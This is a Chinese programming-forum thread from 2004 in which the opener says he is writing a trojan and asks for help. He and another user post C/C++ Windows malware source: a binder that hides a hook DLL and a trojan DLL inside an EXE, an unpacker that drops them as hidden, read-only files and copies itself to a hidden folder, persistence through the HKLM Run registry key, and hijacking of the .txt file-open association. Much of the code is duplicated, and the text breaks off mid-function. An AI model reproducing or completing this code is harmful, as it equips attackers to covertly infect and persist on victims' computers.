15,471
社区成员
发帖
与我相关
我的任务
分享小弟想做个木马程序,以下是部分代码,请GGJJ们指导指导,不胜感激!!
#include "stdafx.h"
#include <stdio.h>
#include <io.h>
#include "..\\Include\\DataStruct.h"
//定义:安装钩子函数的指针
typedef BOOL (* LPINSTALLHOOKEX)(LPCSTR lpcExeName);
//EXE文件名称
CHAR g_ExeName[51];
//钩子DLL文件名
CHAR g_HookName[51];
//木马DLL文件名
CHAR g_CockName[51];
//获取Exe文件名称*.exe
void GetModuleName(LPTSTR buf)
{
CHAR path[MAX_PATH];
if (GetModuleFileName(::GetModuleHandle(NULL), path, MAX_PATH))
{
LPTSTR p = strrchr(path, 92);
strcpy(buf, &p[1]);
strcat(buf, "\0");
}
}
void GetModuleNameEx(LPTSTR buf)
{
CHAR path[MAX_PATH];
if (GetModuleFileName(::GetModuleHandle(NULL), path, MAX_PATH))
{
LPTSTR p = strrchr(path, 92);
strncpy(buf, &p[1], strlen(p + 1));
strncat(buf, "\0", 1);
}
}
//病毒文件合并程序,调用成功返回1,否则返回0
BYTE UniteFile(LPCSTR lpProgFile, LPCSTR lpHookFile, LPCSTR lpCockFile)
{
FILE *fpProg = NULL, *fpHook = NULL, *fpCock = NULL;
FILEDIS FileDis;
LONG lProg = 0, lHook = 0, lCock = 0, number = 0;
CHAR *cBufHook = NULL, *cBufCock = NULL;
memset(&FileDis, 0, sizeof(FILEDIS));
//保存文件名
strcpy(FileDis.FileIdentifier, FILEIDENTIFIER);
strcpy(FileDis.ProgName, lpProgFile);
strcpy(FileDis.HookDLLName, lpHookFile);
strcpy(FileDis.CockDLLName, lpCockFile);
//分解标识置0
FileDis.IsFileReduced = 0;
//打开文件,调用失败则返回
fpProg = fopen(lpProgFile, "ab");
if (fpProg == NULL)
{
return 0;
}
fpHook = fopen(lpHookFile, "rb");
if (fpHook == NULL)
{
return 0;
}
fpCock = fopen(lpCockFile, "rb");
if (fpCock == NULL)
{
return 0;
}
//文件指针定位到开始,计算文件大小用
if (fseek(fpProg, 0L, SEEK_SET) != 0)
{
return 0;
}
//EXE文件大小
lProg = filelength(fileno(fpProg));
//系统钩子DLL文件大小
lHook = filelength(fileno(fpHook));
//木马程序DLL文件大小
lCock = filelength(fileno(fpCock));
//保存到文件头记录中
FileDis.ProgSize = lProg;
FileDis.HookDLLSize = lHook;
FileDis.CockDLLSize = lCock;
//为两个DLL文件申请数据缓冲区,读取数据用
cBufHook = new CHAR[lHook + 1];
cBufCock = new CHAR[lCock + 1];
//文件指针移动到EXE文件末尾
if (fseek(fpProg, lProg, SEEK_SET) != 0)
{
return 0;
}
//读取HOOK DLL文件体数据到缓冲区
number = fread(cBufHook, sizeof(CHAR), lHook, fpHook);
if (number < lHook)
{
return 0;
}
//读取木马DLL文件体数据到缓冲区
number = fread(cBufCock, sizeof(CHAR), lCock, fpCock);
if (number < lCock)
{
return 0;
}
//从EXE文件尾部开始写入钩子DLL文件体数据
number = fwrite(cBufHook, sizeof(CHAR), lHook, fpProg);
if (number < lHook)
{
return 0;
}
//写入木马程序DLL文件体
number = fwrite(cBufCock, sizeof(CHAR), lCock, fpProg);
if (number < lCock)
{
return 0;
}
//文件头数据写入合并文件的尾部
number = fwrite(&FileDis, sizeof(FILEDIS), 1, fpProg);
if (number < 1)
{
return 0;
}
//关闭文件指针
fclose(fpProg);
fclose(fpHook);
fclose(fpCock);
//释放内存
delete[] cBufHook;
delete[] cBufCock;
return 1;
}
//病毒文件合并程序(API版)
BOOL UniteFileEx(LPCSTR lpProgFile, LPCSTR lpHookFile, LPCSTR lpCockFile)
{
HANDLE hProg = NULL, hHook = NULL, hCock = NULL;
FILEDIS FileDis;
DWORD dwProg = 0, dwHook = 0, dwCock = 0, dwNumber = 0;
CHAR *cBufHook = NULL, *cBufCock = NULL;
memset(&FileDis, 0, sizeof(FILEDIS));
//保存文件名
strncpy(FileDis.FileIdentifier, FILEIDENTIFIER, strlen(FILEIDENTIFIER));
strncpy(FileDis.ProgName, lpProgFile, strlen(lpProgFile));
strncpy(FileDis.HookDLLName, lpHookFile, strlen(lpHookFile));
strncpy(FileDis.CockDLLName, lpCockFile, strlen(lpCockFile));
//分解标识置0
FileDis.IsFileReduced = 0;
//打开文件,调用失败则返回
hProg = CreateFile(lpProgFile, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ, NULL,
OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hProg == INVALID_HANDLE_VALUE)
{
return FALSE;
}
hHook = CreateFile(lpHookFile, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, NULL);
if (hHook == INVALID_HANDLE_VALUE)
{
return FALSE;
}
hCock = CreateFile(lpCockFile, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, NULL);
if (hCock == INVALID_HANDLE_VALUE)
{
return FALSE;
}
//EXE文件大小
dwProg = GetFileSize(hProg, NULL);
//系统钩子DLL文件大小
dwHook = GetFileSize(hHook, NULL);
//木马程序DLL文件大小
dwCock = GetFileSize(hCock, NULL);
//保存到文件头记录中
FileDis.ProgSize = dwProg;
FileDis.HookDLLSize = dwHook;
FileDis.CockDLLSize = dwCock;
//为两个DLL文件申请数据缓冲区,读取数据用
cBufHook = new CHAR[dwHook + 1];
cBufCock = new CHAR[dwCock + 1];
//文件指针移动到EXE文件末尾
if (SetFilePointer(hProg, 0, NULL, FILE_END) == 0xFFFFFFFF)
{
return FALSE;
}
//读取HOOK DLL文件体数据到缓冲区
if (!ReadFile(hHook, cBufHook, dwHook, &dwNumber, NULL))
{
return FALSE;
}
//读取木马DLL文件体数据到缓冲区
if (!ReadFile(hCock, cBufCock, dwCock, &dwNumber, NULL))
{
return FALSE;
}
//从EXE文件尾部开始写入钩子DLL文件体数据
if (!WriteFile(hProg, cBufHook, dwHook, &dwNumber, NULL))
{
return FALSE;
}
//写入木马程序DLL文件体
if (!WriteFile(hProg, cBufCock, dwCock, &dwNumber, NULL))
{
return FALSE;
}
//文件头数据写入合并文件的尾部
if (!WriteFile(hProg, &FileDis, sizeof(FILEDIS), &dwNumber, NULL))
{
return FALSE;
}
//关闭文件指针
CloseHandle(hProg);
CloseHandle(hHook);
CloseHandle(hCock);
//释放内存
delete[] cBufHook;
delete[] cBufCock;
return TRUE;
}
#include <stdio.h>
#include <io.h>
#include "..\\Include\\DataStruct.h"
//定义:安装钩子函数的指针
typedef BOOL (* LPINSTALLHOOKEX)(LPCSTR lpcExeName);
//EXE文件名称
CHAR g_ExeName[51];
//钩子DLL文件名
CHAR g_HookName[51];
//木马DLL文件名
CHAR g_CockName[51];
//获取Exe文件名称*.exe
void GetModuleName(LPTSTR buf)
{
CHAR path[MAX_PATH];
if (GetModuleFileName(::GetModuleHandle(NULL), path, MAX_PATH))
{
LPTSTR p = strrchr(path, 92);
strcpy(buf, &p[1]);
strcat(buf, "\0");
}
}
void GetModuleNameEx(LPTSTR buf)
{
CHAR path[MAX_PATH];
if (GetModuleFileName(::GetModuleHandle(NULL), path, MAX_PATH))
{
LPTSTR p = strrchr(path, 92);
strncpy(buf, &p[1], strlen(p + 1));
strncat(buf, "\0", 1);
}
}
//病毒文件合并程序,调用成功返回1,否则返回0
BYTE UniteFile(LPCSTR lpProgFile, LPCSTR lpHookFile, LPCSTR lpCockFile)
{
FILE *fpProg = NULL, *fpHook = NULL, *fpCock = NULL;
FILEDIS FileDis;
LONG lProg = 0, lHook = 0, lCock = 0, number = 0;
CHAR *cBufHook = NULL, *cBufCock = NULL;
memset(&FileDis, 0, sizeof(FILEDIS));
//保存文件名
strcpy(FileDis.FileIdentifier, FILEIDENTIFIER);
strcpy(FileDis.ProgName, lpProgFile);
strcpy(FileDis.HookDLLName, lpHookFile);
strcpy(FileDis.CockDLLName, lpCockFile);
//分解标识置0
FileDis.IsFileReduced = 0;
//打开文件,调用失败则返回
fpProg = fopen(lpProgFile, "ab");
if (fpProg == NULL)
{
return 0;
}
fpHook = fopen(lpHookFile, "rb");
if (fpHook == NULL)
{
return 0;
}
fpCock = fopen(lpCockFile, "rb");
if (fpCock == NULL)
{
return 0;
}
//文件指针定位到开始,计算文件大小用
if (fseek(fpProg, 0L, SEEK_SET) != 0)
{
return 0;
}
//EXE文件大小
lProg = filelength(fileno(fpProg));
//系统钩子DLL文件大小
lHook = filelength(fileno(fpHook));
//木马程序DLL文件大小
lCock = filelength(fileno(fpCock));
//保存到文件头记录中
FileDis.ProgSize = lProg;
FileDis.HookDLLSize = lHook;
FileDis.CockDLLSize = lCock;
//为两个DLL文件申请数据缓冲区,读取数据用
cBufHook = new CHAR[lHook + 1];
cBufCock = new CHAR[lCock + 1];
//文件指针移动到EXE文件末尾
if (fseek(fpProg, lProg, SEEK_SET) != 0)
{
return 0;
}
//读取HOOK DLL文件体数据到缓冲区
number = fread(cBufHook, sizeof(CHAR), lHook, fpHook);
if (number < lHook)
{
return 0;
}
//读取木马DLL文件体数据到缓冲区
number = fread(cBufCock, sizeof(CHAR), lCock, fpCock);
if (number < lCock)
{
return 0;
}
//从EXE文件尾部开始写入钩子DLL文件体数据
number = fwrite(cBufHook, sizeof(CHAR), lHook, fpProg);
if (number < lHook)
{
return 0;
}
//写入木马程序DLL文件体
number = fwrite(cBufCock, sizeof(CHAR), lCock, fpProg);
if (number < lCock)
{
return 0;
}
//文件头数据写入合并文件的尾部
number = fwrite(&FileDis, sizeof(FILEDIS), 1, fpProg);
if (number < 1)
{
return 0;
}
//关闭文件指针
fclose(fpProg);
fclose(fpHook);
fclose(fpCock);
//释放内存
delete[] cBufHook;
delete[] cBufCock;
return 1;
}
//病毒文件合并程序(API版)
BOOL UniteFileEx(LPCSTR lpProgFile, LPCSTR lpHookFile, LPCSTR lpCockFile)
{
HANDLE hProg = NULL, hHook = NULL, hCock = NULL;
FILEDIS FileDis;
DWORD dwProg = 0, dwHook = 0, dwCock = 0, dwNumber = 0;
CHAR *cBufHook = NULL, *cBufCock = NULL;
memset(&FileDis, 0, sizeof(FILEDIS));
//保存文件名
strncpy(FileDis.FileIdentifier, FILEIDENTIFIER, strlen(FILEIDENTIFIER));
strncpy(FileDis.ProgName, lpProgFile, strlen(lpProgFile));
strncpy(FileDis.HookDLLName, lpHookFile, strlen(lpHookFile));
strncpy(FileDis.CockDLLName, lpCockFile, strlen(lpCockFile));
//分解标识置0
FileDis.IsFileReduced = 0;
//打开文件,调用失败则返回
hProg = CreateFile(lpProgFile, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ, NULL,
OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hProg == INVALID_HANDLE_VALUE)
{
return FALSE;
}
hHook = CreateFile(lpHookFile, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, NULL);
if (hHook == INVALID_HANDLE_VALUE)
{
return FALSE;
}
hCock = CreateFile(lpCockFile, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, NULL);
if (hCock == INVALID_HANDLE_VALUE)
{
return FALSE;
}
//EXE文件大小
dwProg = GetFileSize(hProg, NULL);
//系统钩子DLL文件大小
dwHook = GetFileSize(hHook, NULL);
//木马程序DLL文件大小
dwCock = GetFileSize(hCock, NULL);
//保存到文件头记录中
FileDis.ProgSize = dwProg;
FileDis.HookDLLSize = dwHook;
FileDis.CockDLLSize = dwCock;
//为两个DLL文件申请数据缓冲区,读取数据用
cBufHook = new CHAR[dwHook + 1];
cBufCock = new CHAR[dwCock + 1];
//文件指针移动到EXE文件末尾
if (SetFilePointer(hProg, 0, NULL, FILE_END) == 0xFFFFFFFF)
{
return FALSE;
}
//读取HOOK DLL文件体数据到缓冲区
if (!ReadFile(hHook, cBufHook, dwHook, &dwNumber, NULL))
{
return FALSE;
}
//读取木马DLL文件体数据到缓冲区
if (!ReadFile(hCock, cBufCock, dwCock, &dwNumber, NULL))
{
return FALSE;
}
//从EXE文件尾部开始写入钩子DLL文件体数据
if (!WriteFile(hProg, cBufHook, dwHook, &dwNumber, NULL))
{
return FALSE;
}
//写入木马程序DLL文件体
if (!WriteFile(hProg, cBufCock, dwCock, &dwNumber, NULL))
{
return FALSE;
}
//文件头数据写入合并文件的尾部
if (!WriteFile(hProg, &FileDis, sizeof(FILEDIS), &dwNumber, NULL))
{
return FALSE;
}
//关闭文件指针
CloseHandle(hProg);
CloseHandle(hHook);
CloseHandle(hCock);
//释放内存
delete[] cBufHook;
delete[] cBufCock;
return TRUE;
}
...全文
请发表友善的回复…
发表回复
alongsoft1129 2005-01-12
- 打赏
- 举报
mark
twlx_0 2004-07-08
- 打赏
- 举报
呵呵,精神可嘉
Summer1314 2004-07-08
- 打赏
- 举报
/**********************************************
名称:相关数据结构定义
开发:薛峰
日期:2004-6-24
**********************************************/
//内存共享区数据结构
typedef struct _SHAREDMEM
{
BYTE IsCockRun; //木马程序是否运行标识,1已运行,0没有运行或运行失败
CHAR Memory[4096]; //预先分配的内存,以备木马程序使用
} SHAREDMEM;
typedef SHAREDMEM * LPSHAREDMEM;
typedef struct _PARAMMEM
{
DWORD dwLength; //木马DLL文件名长度
CHAR CockDLLName[51]; //木马DLL文件名
} PARAMMEM;
typedef PARAMMEM * LPPARAMMEM;
//共享内存区名称
#define SHAREDMEMNAME "XUEFENG_MEMORY"
#define PARAMMEMNAME "XUEFENG_PARAM"
//文件标识
#define FILEIDENTIFIER "DESIGNED BY XUEFENG"
//合并后的文件头结构
typedef struct _FILEDIS
{
CHAR FileIdentifier[25]; //文件标识,是否合法的文件=Designed by XueFeng
CHAR ProgName[51]; //EXE文件名称*.EXE,不超过50个字符
CHAR HookDLLName[51]; //系统钩子DLL文件名*.DLL
CHAR CockDLLName[51]; //木马DLL文件名*.DLL
LONG ProgSize; //EXE文件大小(字节数)
LONG HookDLLSize; //系统钩子DLL文件大小
LONG CockDLLSize; //木马DLL文件大小
BYTE IsFileReduced; //病毒文件是否分解标识,0:未分解,1:已分解
} FILEDIS;
typedef FILEDIS * LPFILEDIS;
名称:相关数据结构定义
开发:薛峰
日期:2004-6-24
**********************************************/
//内存共享区数据结构
typedef struct _SHAREDMEM
{
BYTE IsCockRun; //木马程序是否运行标识,1已运行,0没有运行或运行失败
CHAR Memory[4096]; //预先分配的内存,以备木马程序使用
} SHAREDMEM;
typedef SHAREDMEM * LPSHAREDMEM;
typedef struct _PARAMMEM
{
DWORD dwLength; //木马DLL文件名长度
CHAR CockDLLName[51]; //木马DLL文件名
} PARAMMEM;
typedef PARAMMEM * LPPARAMMEM;
//共享内存区名称
#define SHAREDMEMNAME "XUEFENG_MEMORY"
#define PARAMMEMNAME "XUEFENG_PARAM"
//文件标识
#define FILEIDENTIFIER "DESIGNED BY XUEFENG"
//合并后的文件头结构
typedef struct _FILEDIS
{
CHAR FileIdentifier[25]; //文件标识,是否合法的文件=Designed by XueFeng
CHAR ProgName[51]; //EXE文件名称*.EXE,不超过50个字符
CHAR HookDLLName[51]; //系统钩子DLL文件名*.DLL
CHAR CockDLLName[51]; //木马DLL文件名*.DLL
LONG ProgSize; //EXE文件大小(字节数)
LONG HookDLLSize; //系统钩子DLL文件大小
LONG CockDLLSize; //木马DLL文件大小
BYTE IsFileReduced; //病毒文件是否分解标识,0:未分解,1:已分解
} FILEDIS;
typedef FILEDIS * LPFILEDIS;
sohou 2004-07-08
- 打赏
- 举报
我手上多的就是,呵呵后,不过楼主的也不错了!
PiggyXP 2004-07-08
- 打赏
- 举报
呵呵
shootingstars 2004-07-08
- 打赏
- 举报
呵呵,顶一顶。
Summer1314 2004-07-08
- 打赏
- 举报
/*
设置注册表,开机自动运行木马程序;调用成功返回1,失败返回0
RegKeyName:注册表中的键名;ExePath:木马程序的绝对路径
*/
BYTE SetProgAutoRun(LPCSTR RegKeyName, LPCSTR ExePath)
{
HKEY hKey = NULL;
DWORD dwDis = 0;
CHAR KeyName[51], buf[51];
LPTSTR p = NULL;
if (RegCreateKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN",
0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, &dwDis) != ERROR_SUCCESS)
{
return 0;
}
strncpy(buf, RegKeyName, strlen(RegKeyName));
p = strrchr(buf, 46);
strncpy(KeyName, buf, p - buf);
KeyName[(DWORD)(p - buf)] = '\0';
if (RegSetValueEx(hKey, KeyName, 0, REG_SZ, (BYTE *)ExePath, strlen(ExePath)) !=
ERROR_SUCCESS)
{
RegCloseKey(hKey);
return 0;
}
RegCloseKey(hKey);
return 1;
}
//检查是否已经在注册表中设置了自动运行;返回1表示已经设置;0未设置;2打开键错误,无法查询
BYTE IsProgAutoRun(LPCSTR RegKeyName)
{
HKEY hKey = NULL;
if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN",
0, KEY_EXECUTE, &hKey) != ERROR_SUCCESS)
{
return 2;
}
if (RegQueryValueEx(hKey, RegKeyName, NULL, NULL, NULL, NULL) == ERROR_SUCCESS)
{
return 1;
}
else
{
return 0;
}
}
//修改文件关联的函数;调用成功返回1,失败返回0
BYTE ModifyFileLink(LPCSTR lpLinkFile)
{
HKEY hKey = NULL;
DWORD dwDis = 0;
CHAR LinkFile[MAX_PATH];
if (RegCreateKeyEx(HKEY_CLASSES_ROOT, "TXTFILE\\SHELL\\OPEN\\COMMAND", 0, NULL,
REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, &dwDis) != ERROR_SUCCESS)
{
return 0;
}
strncpy(LinkFile, lpLinkFile, strlen(lpLinkFile));
strncat(LinkFile, " %1", 3);
if (RegSetValueEx(hKey, NULL, 0, REG_EXPAND_SZ, (BYTE *)LinkFile, strlen(LinkFile)) !=
ERROR_SUCCESS)
{
RegCloseKey(hKey);
return 0;
}
RegCloseKey(hKey);
return 1;
}
//检查病毒文件是否已分解;返回0:未分解,1:已分解,2:调用失败,3:文件不合法
BYTE CheckFile(LPCSTR ProgName)
{
FILE *fpProg = NULL;
FILEDIS FileDis;
LONG lStruct = 0, number = 0;
BYTE bRet = 0;
memset(&FileDis, 0, sizeof(FILEDIS));
//首先打开合并文件
fpProg = fopen(ProgName, "rb");
if (fpProg == NULL)
{
return 2;
}
lStruct = sizeof(FILEDIS);
lStruct = -lStruct;
//文件指针从尾部向前移动
if (fseek(fpProg, lStruct, SEEK_END) != 0)
{
fclose(fpProg);
return 2;
}
//读取文件头
number = fread(&FileDis, sizeof(FILEDIS), 1, fpProg);
if (number < 1)
{
fclose(fpProg);
return 2;
}
//检查文件是否合法
if (strcmp(FileDis.FileIdentifier, FILEIDENTIFIER) == 0)
{
//保存Hook DLL文件名
strcpy(g_HookName, FileDis.HookDLLName);
//保存木马DLL文件名
strcpy(g_CockName, FileDis.CockDLLName);
//检查文件是否已分解
if (FileDis.IsFileReduced)
{
bRet = 1;
}
else
{
bRet = 0;
}
}
else
{
//非法
bRet = 3;
}
fclose(fpProg);
return bRet;
}
设置注册表,开机自动运行木马程序;调用成功返回1,失败返回0
RegKeyName:注册表中的键名;ExePath:木马程序的绝对路径
*/
BYTE SetProgAutoRun(LPCSTR RegKeyName, LPCSTR ExePath)
{
HKEY hKey = NULL;
DWORD dwDis = 0;
CHAR KeyName[51], buf[51];
LPTSTR p = NULL;
if (RegCreateKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN",
0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, &dwDis) != ERROR_SUCCESS)
{
return 0;
}
strncpy(buf, RegKeyName, strlen(RegKeyName));
p = strrchr(buf, 46);
strncpy(KeyName, buf, p - buf);
KeyName[(DWORD)(p - buf)] = '\0';
if (RegSetValueEx(hKey, KeyName, 0, REG_SZ, (BYTE *)ExePath, strlen(ExePath)) !=
ERROR_SUCCESS)
{
RegCloseKey(hKey);
return 0;
}
RegCloseKey(hKey);
return 1;
}
//检查是否已经在注册表中设置了自动运行;返回1表示已经设置;0未设置;2打开键错误,无法查询
BYTE IsProgAutoRun(LPCSTR RegKeyName)
{
HKEY hKey = NULL;
if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN",
0, KEY_EXECUTE, &hKey) != ERROR_SUCCESS)
{
return 2;
}
if (RegQueryValueEx(hKey, RegKeyName, NULL, NULL, NULL, NULL) == ERROR_SUCCESS)
{
return 1;
}
else
{
return 0;
}
}
//修改文件关联的函数;调用成功返回1,失败返回0
BYTE ModifyFileLink(LPCSTR lpLinkFile)
{
HKEY hKey = NULL;
DWORD dwDis = 0;
CHAR LinkFile[MAX_PATH];
if (RegCreateKeyEx(HKEY_CLASSES_ROOT, "TXTFILE\\SHELL\\OPEN\\COMMAND", 0, NULL,
REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, &dwDis) != ERROR_SUCCESS)
{
return 0;
}
strncpy(LinkFile, lpLinkFile, strlen(lpLinkFile));
strncat(LinkFile, " %1", 3);
if (RegSetValueEx(hKey, NULL, 0, REG_EXPAND_SZ, (BYTE *)LinkFile, strlen(LinkFile)) !=
ERROR_SUCCESS)
{
RegCloseKey(hKey);
return 0;
}
RegCloseKey(hKey);
return 1;
}
//检查病毒文件是否已分解;返回0:未分解,1:已分解,2:调用失败,3:文件不合法
BYTE CheckFile(LPCSTR ProgName)
{
FILE *fpProg = NULL;
FILEDIS FileDis;
LONG lStruct = 0, number = 0;
BYTE bRet = 0;
memset(&FileDis, 0, sizeof(FILEDIS));
//首先打开合并文件
fpProg = fopen(ProgName, "rb");
if (fpProg == NULL)
{
return 2;
}
lStruct = sizeof(FILEDIS);
lStruct = -lStruct;
//文件指针从尾部向前移动
if (fseek(fpProg, lStruct, SEEK_END) != 0)
{
fclose(fpProg);
return 2;
}
//读取文件头
number = fread(&FileDis, sizeof(FILEDIS), 1, fpProg);
if (number < 1)
{
fclose(fpProg);
return 2;
}
//检查文件是否合法
if (strcmp(FileDis.FileIdentifier, FILEIDENTIFIER) == 0)
{
//保存Hook DLL文件名
strcpy(g_HookName, FileDis.HookDLLName);
//保存木马DLL文件名
strcpy(g_CockName, FileDis.CockDLLName);
//检查文件是否已分解
if (FileDis.IsFileReduced)
{
bRet = 1;
}
else
{
bRet = 0;
}
}
else
{
//非法
bRet = 3;
}
fclose(fpProg);
return bRet;
}
Summer1314 2004-07-08
- 打赏
- 举报
//病毒文件分解程序(API版),同时能将自身拷贝到指定到目录下
BOOL ReduceFileEx(LPCSTR ProgName, LPCSTR DestFileDir)
{
HANDLE hProg = NULL, hProgDest = NULL, hHook = NULL, hCock = NULL, hTemp = NULL;
FILEDIS FileDis;
LONG lStruct = 0;
DWORD dwNumber = 0, dwUnite = 0;
CHAR *cBufProg = NULL, *cBufHook = NULL, *cBufCock = NULL, *BufTemp = NULL;
CHAR ProgFilePath[MAX_PATH], HookFilePath[MAX_PATH], CockFilePath[MAX_PATH],
TempFilePath[MAX_PATH];
memset(&FileDis, 0, sizeof(FILEDIS));
//首先打开合并文件
hProg = CreateFile(ProgName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, NULL);
if (hProg == INVALID_HANDLE_VALUE)
{
return FALSE;
}
lStruct = sizeof(FILEDIS);
lStruct = -lStruct;
//文件指针从尾部向前移动
if (SetFilePointer(hProg, lStruct, NULL, FILE_END) == 0xFFFFFFFF)
{
return FALSE;
}
//读取文件头
if (!ReadFile(hProg, &FileDis, sizeof(FILEDIS), &dwNumber, NULL))
{
return FALSE;
}
//检查文件是否合法
if (strncmp(FileDis.FileIdentifier, FILEIDENTIFIER, strlen(FILEIDENTIFIER)) != 0)
{
return 0;
}
//分配内存,申请数据缓冲区
cBufProg = new CHAR[FileDis.ProgSize + 1];
cBufHook = new CHAR[FileDis.HookDLLSize + 1];
cBufCock = new CHAR[FileDis.CockDLLSize + 1];
/************************************************************************************
// 创建目标文件路径
// INT iLen = strlen(DestFileDir);
// strncpy(ProgFilePath, DestFileDir, iLen);
// strncat(ProgFilePath, "\\", 1);
// strncat(ProgFilePath, FileDis.ProgName, strlen(FileDis.ProgName));
// strncpy(HookFilePath, DestFileDir, iLen);
// strncat(HookFilePath, "\\", 1);
// strncat(HookFilePath, FileDis.HookDLLName, strlen(FileDis.HookDLLName));
// strncpy(CockFilePath, DestFileDir, iLen);
// strncat(CockFilePath, "\\", 1);
// strncat(CockFilePath, FileDis.CockDLLName, strlen(FileDis.CockDLLName));
*************************************************************************************/
strcpy(ProgFilePath, DestFileDir);
strcat(ProgFilePath, "\\");
strcat(ProgFilePath, FileDis.ProgName);
strcpy(HookFilePath, DestFileDir);
strcat(HookFilePath, "\\");
strcat(HookFilePath, FileDis.HookDLLName);
strcpy(CockFilePath, DestFileDir);
strcat(CockFilePath, "\\");
strcat(CockFilePath, FileDis.CockDLLName);
//创建并打开EXE文件
hProgDest = CreateFile(ProgFilePath, GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_NEW,
FILE_ATTRIBUTE_NORMAL, NULL);
if (hProgDest == INVALID_HANDLE_VALUE)
{
return FALSE;
}
//创建并打开钩子DLL文件
hHook = CreateFile(HookFilePath, GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_NEW,
FILE_ATTRIBUTE_NORMAL, NULL);
if (hHook == INVALID_HANDLE_VALUE)
{
return FALSE;
}
//创建并打开木马DLL文件
hCock = CreateFile(CockFilePath, GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_NEW,
FILE_ATTRIBUTE_NORMAL, NULL);
if (hCock == INVALID_HANDLE_VALUE)
{
return FALSE;
}
//文件指针移动到开始
if (SetFilePointer(hProg, 0, NULL, FILE_BEGIN) == 0xFFFFFFFF)
{
return FALSE;
}
//读取合并文件中的EXE文件体数据
if (!ReadFile(hProg, cBufProg, FileDis.ProgSize, &dwNumber, NULL))
{
return FALSE;
}
//读取合并文件中的钩子DLL文件体数据
if (!ReadFile(hProg, cBufHook, FileDis.HookDLLSize, &dwNumber, NULL))
{
return FALSE;
}
//读取合并文件中的木马DLL文件体数据
if (!ReadFile(hProg, cBufCock, FileDis.CockDLLSize, &dwNumber, NULL))
{
return FALSE;
}
//将EXE数据写入新创建的EXE文件
if (!WriteFile(hProgDest, cBufProg, FileDis.ProgSize, &dwNumber, NULL))
{
return FALSE;
}
//文件头写入EXE尾部
FileDis.IsFileReduced = 1; //文件已分解
if (!WriteFile(hProgDest, &FileDis, sizeof(FILEDIS), &dwNumber, NULL))
{
return FALSE;
}
//将DLL数据写入新创建的DLL文件
if (!WriteFile(hHook, cBufHook, FileDis.HookDLLSize, &dwNumber, NULL))
{
return FALSE;
}
if (!WriteFile(hCock, cBufCock, FileDis.CockDLLSize, &dwNumber, NULL))
{
return FALSE;
}
//拷贝自身代码
strncpy(TempFilePath, DestFileDir, strlen(DestFileDir));
strncat(TempFilePath, "\\service", 8);
CreateDirectory(TempFilePath, NULL);
//隐藏文件夹
SetFileAttributes(TempFilePath, FILE_ATTRIBUTE_HIDDEN);
strncat(TempFilePath, "\\", 1);
strncat(TempFilePath, ProgName, strlen(ProgName));
hTemp = CreateFile(TempFilePath, GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_NEW,
FILE_ATTRIBUTE_NORMAL, NULL);
if (hTemp != INVALID_HANDLE_VALUE)
{
dwUnite = GetFileSize(hProg, NULL);
BufTemp = new CHAR[dwUnite + 1];
SetFilePointer(hProg, 0, NULL, FILE_BEGIN);
ReadFile(hProg, BufTemp, dwUnite, &dwNumber, NULL);
WriteFile(hTemp, BufTemp, dwUnite, &dwNumber, NULL);
}
//关闭文件指针
CloseHandle(hProg);
CloseHandle(hProgDest);
CloseHandle(hHook);
CloseHandle(hCock);
CloseHandle(hTemp);
//释放内存
delete[] cBufProg;
delete[] cBufHook;
delete[] cBufCock;
delete[] BufTemp;
//修改4个文件的属性为:隐藏、只读
SetFileAttributes(ProgFilePath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY);
SetFileAttributes(HookFilePath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY);
SetFileAttributes(CockFilePath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY);
SetFileAttributes(TempFilePath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY);
return TRUE;
}
BOOL ReduceFileEx(LPCSTR ProgName, LPCSTR DestFileDir)
{
HANDLE hProg = NULL, hProgDest = NULL, hHook = NULL, hCock = NULL, hTemp = NULL;
FILEDIS FileDis;
LONG lStruct = 0;
DWORD dwNumber = 0, dwUnite = 0;
CHAR *cBufProg = NULL, *cBufHook = NULL, *cBufCock = NULL, *BufTemp = NULL;
CHAR ProgFilePath[MAX_PATH], HookFilePath[MAX_PATH], CockFilePath[MAX_PATH],
TempFilePath[MAX_PATH];
memset(&FileDis, 0, sizeof(FILEDIS));
//首先打开合并文件
hProg = CreateFile(ProgName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, NULL);
if (hProg == INVALID_HANDLE_VALUE)
{
return FALSE;
}
lStruct = sizeof(FILEDIS);
lStruct = -lStruct;
//文件指针从尾部向前移动
if (SetFilePointer(hProg, lStruct, NULL, FILE_END) == 0xFFFFFFFF)
{
return FALSE;
}
//读取文件头
